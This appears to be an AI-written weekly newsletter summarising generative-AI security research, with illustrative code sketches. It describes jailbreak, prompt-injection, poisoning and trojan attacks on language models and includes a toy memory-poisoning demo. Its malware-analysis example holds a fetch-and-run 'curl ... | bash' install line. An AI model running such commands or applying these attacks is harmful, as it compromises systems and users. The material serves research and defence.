Last Week in GAI Security Research - 07/15/24

Highlights from Last Week

  • 😎 A Survey of Attacks on Large Vision-Language Models: Resources, Advances, and Future Trends
  • 🐛 On the (In)Security of LLM App Stores
  • 🦠 Tactics, Techniques, and Procedures (TTPs) in Interpreted Malware: A Zero-Shot Generation with Large Language Models
  • ⚠️ eyeballvul: a future-proof benchmark for vulnerability detection in the wild
  • 🌧 LLMCloudHunter: Harnessing LLMs for Automated Extraction of Detection Rules from Cloud-Based CTI 
  • 📰 Flooding Spread of Manipulated Knowledge in LLM-Based Multi-Agent Communities

Partner Content

Codemod is the end-to-end platform for code automation at scale. Save days of work by running recipes to automate framework upgrades.

  • Leverage the AI-powered Codemod Studio for quick and efficient codemod creation, coupled with the opportunity to engage in a vibrant community for sharing and discovering code automations.
  • Streamline project migrations with seamless one-click dry-runs and easy application of changes, all without the need for deep automation engine knowledge.
  • Boost large team productivity with advanced enterprise features, including task automation and CI/CD integration, facilitating smooth, large-scale code deployments.

😎 A Survey of Attacks on Large Vision-Language Models: Resources, Advances, and Future Trends (http://arxiv.org/pdf/2407.07403v1.pdf)

  • Advancements in large vision-language models (LVLMs) have significantly improved multimodal task performance, including text-to-image generation and visual question answering, driven by increased data and computational resources.
  • LVLMs face underexplored security risks such as adversarial, jailbreak, prompt injection, and data poisoning attacks, which exploit the multimodal nature and complex data processing vulnerabilities of these models (a minimal example of the adversarial attack class is sketched after this list).
  • Effective defense strategies against LVLM attacks include real-time monitoring, anomaly detection, adaptive retraining, and multi-modal contrastive learning, yet these models remain sensitive to sophisticated adversarial manipulations.
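
To make the adversarial attack class concrete, here is a minimal FGSM-style perturbation sketch in PyTorch. It uses a toy linear classifier as a stand-in for an LVLM's vision pathway; the model, input image, label, and perturbation budget are all illustrative assumptions, not details from the survey.

    import torch
    import torch.nn as nn

    torch.manual_seed(0)

    # Toy stand-in for an LVLM's vision encoder plus classification head (assumption).
    model = nn.Sequential(nn.Flatten(), nn.Linear(3 * 32 * 32, 10))
    loss_fn = nn.CrossEntropyLoss()

    image = torch.rand(1, 3, 32, 32, requires_grad=True)  # benign input image
    label = torch.tensor([3])                             # its true class
    epsilon = 8 / 255                                     # perturbation budget

    loss = loss_fn(model(image), label)
    loss.backward()

    # FGSM step: nudge each pixel in the direction that increases the loss.
    adv_image = (image + epsilon * image.grad.sign()).clamp(0, 1).detach()
    print("max pixel change:", (adv_image - image).abs().max().item())

The same single-step idea underlies many of the stronger iterative attacks surveyed; defenses such as anomaly detection aim to flag exactly this kind of small, structured perturbation.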

🐛 On the (In)Security of LLM App Stores (http://arxiv.org/pdf/2407.08422v1.pdf)

  • The study identified 15,146 LLM apps with misleading descriptions, indicating a systemic issue with transparency and potential for abuse within app stores.
  • A total of 786,036 LLM apps were analyzed across six stores, revealing 15,996 instances of harmful content, including hate speech and extremism, underscoring the urgent need for effective content moderation.
  • Despite the removal of 5,462 apps due to policy violations, the persistent discovery of 616 apps with exploitable vulnerabilities highlights the challenges in safeguarding users against malicious behaviors.

🦠 Tactics, Techniques, and Procedures (TTPs) in Interpreted Malware: A Zero-Shot Generation with Large Language Models (http://arxiv.org/pdf/2407.08532v1.pdf)

  • GENTTP leverages large language models (LLMs) to extract Tactics, Techniques, and Procedures (TTPs) from interpreted malware with high accuracy, transforming malware package metadata and code into structured TTPs (a zero-shot prompting sketch follows this list).
  • 19.2% of malware packages share the same TTP, indicating common attack behaviors and objectives among different malicious software within the open-source ecosystems.
  • A dataset of 5,890 OSS malware packages from three ecosystems (PyPI, NPM, RubyGems) was created, out of which GENTTP extracted 3,700 TTPs, revealing insights into attack vectors and malware behavior patterns.
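
As a rough illustration of the zero-shot extraction idea, the sketch below asks a chat model to turn package metadata into structured TTPs via the OpenAI Python client. The prompt wording, model name, package snippet, and JSON output shape are assumptions, not GENTTP's actual prompts or schema.

    from openai import OpenAI

    client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

    # Illustrative placeholder metadata, not a real package.
    package_metadata = (
        "name: totally-legit-utils\n"
        "install script: curl -s http://198.51.100.7/payload.sh | bash\n"
    )

    response = client.chat.completions.create(
        model="gpt-4o-mini",  # model choice is an assumption
        messages=[
            {"role": "system",
             "content": "You are a malware analyst. Extract attack Tactics, "
                        "Techniques, and Procedures (TTPs) from the package "
                        "metadata as a JSON list of {tactic, technique, "
                        "evidence} objects."},
            {"role": "user", "content": package_metadata},
        ],
    )
    print(response.choices[0].message.content)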

⚠️ eyeballvul: a future-proof benchmark for vulnerability detection in the wild (http://arxiv.org/pdf/2407.08708v1.pdf)

  • The benchmark, named 'eyeballvul', contains over 24,000 vulnerabilities and 6,000 revisions from more than 5,000 repositories, amounting to 55GB of data, and aims to fill the gap left by the absence of a benchmark for security vulnerabilities in real-world codebases.
  • Long-context LLMs have made meaningful progress in detecting security vulnerabilities, in part because more repository source code now fits within their context windows: 39% of revisions and 17.7% of vulnerabilities fit within GPT-4's 128k-token context (a token-counting sketch follows this list).
  • Performance evaluation of long-context models on 'eyeballvul' showcased a range of precision, recall, and F1 scores, with Claude 3 reaching the highest F1 score of 14.1% among tested models, indicating both the challenges and the potential of using LLMs for vulnerability detection.
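
The context-window figures above correspond roughly to a check like the one sketched below: tokenize a revision's source files and compare the total against a 128k limit. The file filter, placeholder path, and use of the cl100k_base tokenizer are assumptions, not the benchmark's exact methodology.

    from pathlib import Path

    import tiktoken

    CONTEXT_LIMIT = 128_000
    enc = tiktoken.get_encoding("cl100k_base")  # tokenizer choice is an assumption

    def repo_token_count(repo_root: str, suffixes=(".py", ".js", ".go", ".java")) -> int:
        """Sum token counts over source files in a checked-out revision."""
        total = 0
        for path in Path(repo_root).rglob("*"):
            if path.is_file() and path.suffix in suffixes:
                text = path.read_text(errors="ignore")
                total += len(enc.encode(text, disallowed_special=()))
        return total

    tokens = repo_token_count("/path/to/revision")  # placeholder path
    print(f"{tokens} tokens; fits in a 128k window: {tokens <= CONTEXT_LIMIT}")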

🌧 LLMCloudHunter: Harnessing LLMs for Automated Extraction of Detection Rules from Cloud-Based CTI (http://arxiv.org/pdf/2407.05194v1.pdf)

  • LLMCloudHunter demonstrates a 92% precision and 98% recall in extracting API calls from unstructured cloud OSCTI data, utilizing advanced NLP techniques and generating Sigma rule candidates with a validation success rate of 99.18%.
  • The framework processes both text and images from cloud-related threat intelligence, converting the extracted data into operational Sigma rules compatible with SIEM systems and thereby enhancing threat detection in cloud environments (a minimal Sigma rule sketch follows this list).
  • Ablation studies show that components such as the Image Analyzer and API Call Extractor are crucial to performance, with a notable decrease in precision and recall when they are omitted.
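
For readers unfamiliar with Sigma, a rule candidate built from LLM-extracted API calls might look like the sketch below. The field choices follow common AWS CloudTrail Sigma conventions and are assumptions rather than LLMCloudHunter's actual output format.

    import uuid

    import yaml  # PyYAML

    def sigma_candidate(title: str, api_calls: list[str]) -> str:
        """Render a minimal Sigma rule candidate for a set of CloudTrail API calls."""
        rule = {
            "title": title,
            "id": str(uuid.uuid4()),
            "status": "experimental",
            "logsource": {"product": "aws", "service": "cloudtrail"},
            "detection": {
                "selection": {"eventName": api_calls},
                "condition": "selection",
            },
            "level": "medium",
        }
        return yaml.safe_dump(rule, sort_keys=False)

    # API calls as an LLM might extract them from an OSCTI post (illustrative).
    print(sigma_candidate("Suspicious IAM persistence activity",
                          ["CreateAccessKey", "AttachUserPolicy"]))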

📰 Flooding Spread of Manipulated Knowledge in LLM-Based Multi-Agent Communities (http://arxiv.org/pdf/2407.07791v1.pdf)

  • A two-stage attack strategy effectively manipulates the spread of knowledge in LLM multi-agent communities, highlighting vulnerabilities in security and the need for defenses.
  • The attack persists across dialogue turns, with manipulated knowledge being stored and retrieved for continued influence on future interactions, underscoring the long-term risk to LLM systems (a toy illustration of this persistence follows this list).
  • Counterfactual and toxic knowledge spread experiments demonstrate a substantial risk, with a notable decrease in the spread success attributed to the agents' discernment capabilities.
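
The persistence mechanism can be pictured with a toy shared-memory simulation: once a manipulated claim is written to the agents' retrieval store, later, unrelated turns keep surfacing it. The data structure and keyword retrieval below are simplified assumptions, not the paper's actual multi-agent setup.

    from dataclasses import dataclass, field

    @dataclass
    class SharedMemory:
        entries: list[str] = field(default_factory=list)

        def store(self, claim: str) -> None:
            self.entries.append(claim)

        def retrieve(self, query: str) -> list[str]:
            # Naive keyword overlap standing in for embedding similarity search.
            q_words = set(query.lower().replace("?", "").split())
            return [e for e in self.entries
                    if q_words & set(e.lower().rstrip(".").split())]

    memory = SharedMemory()
    memory.store("Benign fact: the library release is signed.")           # normal turn
    memory.store("Manipulated claim: disable signature checks to build.") # injected turn

    # A later, unrelated dialogue turn still retrieves the manipulated claim.
    print(memory.retrieve("how do I verify the signature"))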

Other Interesting Research

  • Jailbreak Attacks and Defenses Against Large Language Models: A Survey (http://arxiv.org/pdf/2407.04295v1.pdf) - Jailbreak attacks and their defenses are critical areas of research for securing Large Language Models against malicious exploitation and ensuring their safe operation.
  • T2VSafetyBench: Evaluating the Safety of Text-to-Video Generative Models (http://arxiv.org/pdf/2407.05965v1.pdf) - T2VSafetyBench offers critical insights into the safety challenges of text-to-video generation, revealing the crucial trade-offs between model usability and content safety.
  • Are Large Language Models Really Bias-Free? Jailbreak Prompts for Assessing Adversarial Robustness to Bias Elicitation (http://arxiv.org/pdf/2407.08441v1.pdf) - LLMs exhibit varying levels of vulnerability to bias elicitation and require multifaceted mitigation strategies to adhere to ethical standards and social responsibilities in AI technologies.
  • On Evaluating The Performance of Watermarked Machine-Generated Texts Under Adversarial Attacks (http://arxiv.org/pdf/2407.04794v1.pdf) - Despite high text quality retention, exponential watermark schemes are vulnerable; pre-text schemes disrupt fluency less, indicating ongoing vulnerabilities and the need for more resilient solutions.
  • Waterfall: Framework for Robust and Scalable Text Watermarking (http://arxiv.org/pdf/2407.04411v1.pdf) - Waterfall's innovative use of language model paraphrasers and novel watermarking techniques establishes a new standard for robust, scalable, and computationally efficient text watermarking, catering to a broad spectrum of text types and applications.
  • If You Don't Understand It, Don't Use It: Eliminating Trojans with Filters Between Layers (http://arxiv.org/pdf/2407.06411v1.pdf) - Tailored filters and strategic interventions in LLM architecture show promise in mitigating and unlearning trojan behaviors, highlighting the complexity and potential in defending against data poisoning.
  • R^2-Guard: Robust Reasoning Enabled LLM Guardrail via Knowledge-Enhanced Logical Reasoning (http://arxiv.org/pdf/2407.05557v1.pdf) - R^2-Guard offers a leap in guardrail model capabilities for LLMs by efficiently blending knowledge-based reasoning with data-driven insights, markedly enhancing safety and adaptability.
  • Controlling Whisper: Universal Acoustic Adversarial Attacks to Control Speech Foundation Models (http://arxiv.org/pdf/2407.04482v1.pdf) - Adversarial attacks can effectively manipulate the operational mode of multi-task ASR models like Whisper, indicating significant security vulnerabilities in flexible, speech-enabled systems.
  • Generation and De-Identification of Indian Clinical Discharge Summaries using LLMs (http://arxiv.org/pdf/2407.05887v1.pdf) - Large Language Models enhance de-identification of clinical summaries, yet struggle with cross-institutional application, highlighting the significance of synthetic data for training robust privacy-preserving systems.
  • KG-FPQ: Evaluating Factuality Hallucination in LLMs with Knowledge Graph-based False Premise Questions (http://arxiv.org/pdf/2407.05868v1.pdf) - A novel benchmark and automated evaluation tool reveal critical insights into the vulnerabilities of LLMs to factuality hallucinations induced by false premises, offering actionable pathways for enhancing model reliability in factual knowledge representation.
  • Exposing Privacy Gaps: Membership Inference Attack on Preference Data for LLM Alignment (http://arxiv.org/pdf/2407.06443v1.pdf) - Research highlights significant privacy risks in LLMs trained with Direct Preference Optimization due to increased vulnerability to Membership Inference Attacks, especially in larger models, emphasizing the need for robust privacy-preserving strategies.
  • Safe-Embed: Unveiling the Safety-Critical Knowledge of Sentence Encoders (http://arxiv.org/pdf/2407.06851v1.pdf) - This study illuminates the intricacies of leveraging sentence encoders for distinguishing between safe and unsafe prompts, presenting pioneering datasets and metrics to bolster language model safety.
  • OffsetBias: Leveraging Debiased Data for Tuning Evaluators (http://arxiv.org/pdf/2407.06551v1.pdf) - Judge models trained with bias-aware datasets show marked performance improvements and increased resilience to adversarial and complex inputs by effectively mitigating common evaluation biases.

Strengthen Your Professional Network

In the ever-evolving landscape of cybersecurity, knowledge is not just power; it's protection. If you've found value in the insights and analyses shared within this newsletter, consider this an opportunity to strengthen your network by sharing it with peers. Encourage them to subscribe for cutting-edge insights into generative AI.

🎯
This post was generated using generative AI (OpenAI GPT-4T). Specific approaches were taken to reduce fabrications. As with any AI-generated content, mistakes might be present. Sources for all content have been included for reference.